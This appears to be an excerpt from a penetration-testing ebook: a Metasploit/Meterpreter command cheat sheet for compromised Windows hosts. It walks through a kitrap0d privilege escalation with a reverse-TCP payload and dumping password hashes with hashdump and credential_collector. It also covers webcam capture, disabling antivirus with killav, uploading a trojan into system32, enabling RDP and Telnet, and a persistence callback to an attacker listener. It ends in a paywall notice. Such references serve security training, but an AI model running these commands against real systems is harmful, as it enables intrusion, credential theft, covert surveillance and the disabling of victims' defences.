Meterpreter

  • msf > sessions [options or ID]: The sessions command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNCs, and so on (use sessions -h to get help).

  • meterpreter > background: This will send the current Meterpreter session to the background and return you to the msf prompt.

  • meterpreter > getuid: Displays to the user whether the Meterpreter server is running on the host.
  • meterpreter > sysinfo: Displays the victim's OS info.
  • meterpreter > cd: Changes the current directory on the compromised system.
  • meterpreter > ls: Lists the current directory's contents.
  • meterpreter > pwd: Prints the current directory on the compromised system.
  • meterpreter > ps: Displays a list of running processes on the target.
  • meterpreter > run post/windows/manage/migrate: Migrates to another process on the victim.
  • meterpreter > use priv:  Use this command before executing the getsystem command.
  • meterpreter > getsystem: Use this command to elevate your privileges.

If you get the error priv_elevate_getsystem: Operation failed: Access is denied, then follow these steps:

meterpreter > background

Option 1:

msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > run

Option 2:

  • msf > use exploit/windows/local/: List of all Windows exploits.
  • msf > use exploit/windows/local/ms10_015_kitrap0d: We've chosen one exploit from the list, as follows:
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.100
msf exploit(ms10_015_kitrap0d) > set LPORT 4445
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM - Hooray
  • meterpreter > search: Provides a way of locating specific files on the target host. For example, search -f passwords*.txt.
  • meterpreter > cat [file name path]: Displays the content of a file when it's given as an argument.
  • meterpreter > download [file name path]: Downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. For example, download C:\passwords.txt.
  • meterpreter > upload [local file name] [remote path]: For example, upload evil_trojan.exe c:\windows\system32.
  • meterpreter > execute [command]: Runs a command on the target system
  • meterpreter > shell: Executes the shell (Terminal or DOS) on the target system.
  • meterpreter > run post/windows/gather/hashdump: A post module that will dump the contents of the SAM database.
  • meterpreter >ipconfig: Displays the network interfaces and addresses on the remote machine.
  • meterpreter > webcam_list: Displays the currently available webcams on the target host.
  • meterpreter > webcam_snap: Grabs a picture from a connected webcam on the target system and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename. For example, webcam_snap -i 1 -v false.
  • meterpreter > python_import [local python file]: Imports a local Python file and executes it on the victim's machine. For example,  meterpreter > python_import -f /root/readAutoLogonREG.py.
  • meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
  • meterpreter > run post/windows/gather/checkvm: Checks to see if the compromised host is a virtual machine.
  • meterpreter > run post/windows/gather/credentials/credential_collector: Harvests passwords hashes and tokens on the compromised host.
  • meterpreter > run post/windows/gather/dumplinks: The dumplinks module parses the .lnk files in a user's recent documents, which could be useful for further information gathering.
  • meterpreter > run post/windows/gather/enum_applications: Enumerates the applications that are installed on the compromised host.
  • meterpreter > run post/windows/gather/enum_logged_on_users: Returns a list of current and recently logged on users, along with their SIDs.
  • meterpreter > run post/windows/gather/enum_shares: Returns a list of both configured and recently used shares on the compromised system.
  • meterpreter > run post/windows/gather/enum_snmp: Enumerates the SNMP service configuration on the target, if present, including the community strings.
  • meterpreter > run post/windows/gather/hashdump: Dumps the local users' accounts on the compromised host using the registry.
  • meterpreter > run post/windows/gather/usb_history: Enumerates the USB drive history on the compromised system.
  • meterpreter > run getcountermeasure: Checks the security configuration on the victims' system and can disable other security measures, such as A/V, the firewall, and much more.
  • meterpreter > run getgui -e: Enables RDP on a target system if it is disabled.
  • meterpreter > run gettelnet -e: Enables Telnet on the victim if it is disabled.
  • meterpreter > run killav: Disables most antivirus programs running as a service on a target.
  • meterpreter > run remotewinenum -u administrator -p password123 -t 10.0.0.100: Enumerates the system information through wmic on the victim. Makes note of where the logs are stored.
  • meterpreter > run scraper: Grabs the system information, including the entire registry
  • meterpreter > run winenum: This makes for a very detailed Windows enumeration tool. It dumps tokens, hashes, and much more.
  • meterpreter > run persistence -U -i 10 -p 443 -r 192.168.1.5: Configures our persistent Meterpreter session to wait until a user logs on to the remote system and tries to connect back to our listener every 10 seconds at IP address 192.168.1.5 on port 443.
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.149.26.176